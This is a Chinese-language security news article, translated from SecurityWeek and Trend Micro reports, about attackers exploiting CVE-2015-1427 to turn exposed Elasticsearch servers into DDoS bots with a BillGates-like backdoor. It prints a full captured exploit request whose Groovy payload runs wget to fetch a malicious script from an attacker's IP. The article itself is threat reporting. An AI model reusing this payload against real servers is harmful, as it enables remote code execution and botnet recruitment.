有黑客正将公网中的Elasticsearch转换为DDoS工具

据趋势科技的报告，最近检测到一股新兴的网络攻击活动，攻击者试图将公网上不安全的Elasticsearch拉入分布式拒绝服务（DDoS）攻击的僵尸网络中。

攻击者会通过多个恶意脚本在Elasticsearch服务器上建立后门，持久控制，并将其转换为DDoS僵尸。

在攻击的准备阶段，攻击者会搜索公网上所有能访问到的Elasticsearch服务器，并利用CVE-2015-1427（ElasticSearch Groovy远程代码执行漏洞）进行扫描攻击，攻击样例如下所示。一旦攻击成功，控制了目标服务器，就会下载第一阶段恶意脚本。

request_url=”3[.]17[.]149[.]255[:]9200/_search?source=%7B%22query%22%3A+%7B%22filtered%22%3A+%7B%22query%22%3A+%7B%22match_all%22%3A+%7B%7D%7D%7D%7D%2C+%22sc ript_fields%22%3A+%7B%22exp%22%3A+%7B%22sc ript%22%3A+%22import+java.util.%2A%3Bimport+java.io.%2A%3BString+str+%3D+%5C%22%5C%22%3BBufferedReader+br+%3D+new+BufferedReader%28new+InputStreamReader%28Runtime.getRuntime%28%29.exec%28%5C%22wget+154.223.159.5%2Fs67.sh+-O+S67%5C%22%29.getInputStream%28%29%29%29%3BStringBuilder+sb+%3D+new+StringBuilder%28%29%3Bwhile%28%28str%3Dbr.readLine%28%29%29%21%3Dnull%29%7Bsb.append%28str%29%3Bsb.append%28%5C%22%5Cr%5Cn%5C%22%29%3B%7Dsb.toString%28%29%3B%22%7D%7D%2C+%22size%22%3A+1%7D

第一阶段恶意脚本会尝试关闭防火墙，再从攻击者控制的网站下载第二阶段恶意脚本。

攻击者会把第二阶段恶意脚本放置在已非法入侵的其他网站上，一旦发现脚本有被他人扫描检测的迹象，立刻用其他已控制网站进行切换。

第二阶段脚本具有与第一阶段脚本类似的功能，它也会试图关闭防火墙。除此之外，它还会删除某些可能与自己发生冲突的软件（例如其他挖矿软件）以及在/tmp目录中的各种配置文件。

接下来，排除对自己的一切不利因素（挖矿以及其他无关进程等），尝试删除初始攻击痕迹，下载恶意软件。

最终的payload是一个后门，能够窃取系统信息并驱动机器发动DDoS攻击。这种批量控制服务器并发动DDoS攻击的安全事件以前也发生过，主要涉及到CVE-2017-5638，这是Apache Struts 2中的一个远程代码执行漏洞。

这次攻击活动中的恶意软件类似于BillGates，该恶意软件于2014年首次被发现，并以劫持系统、发起DDoS攻击而闻名。 趋势科技的安全人员也确认了这点。

今年早些时候，思科的Talos安全研究人员就透露过，有多个黑客团体瞄准了公网上不安全的Elasticsearch集群，其中一个团队就试图用BillGates感染服务器。

趋势科技最后表示，对Elasticsearch服务器的攻击往往是低成本高收益的。攻击者往往瞄准那些存在权限控制缺陷、配置错误以及版本过低的Elasticsearch，进行勒索和挖矿攻击。此次攻击活动中，攻击者使用了多阶段的恶意脚本，并且为了防止被溯源，还使用了大量肉鸡网站来传递脚本。这说明攻击者是在深思熟虑，且做了很多准备后，才发动如此大规模的攻击活动。

本文由白帽汇整理并翻译，不代表白帽汇任何观点和立场
来源：https://www.securityweek.com/attackers-turn-elasticsearch-databa ses-ddos-bots
     https://blog.trendmicro.com/trendlabs-security-intelligence/multistage-attack-delivers-billgates-setag-backdoor-can-turn-elasticsearch-databa ses-into-ddos-botnet-zombies/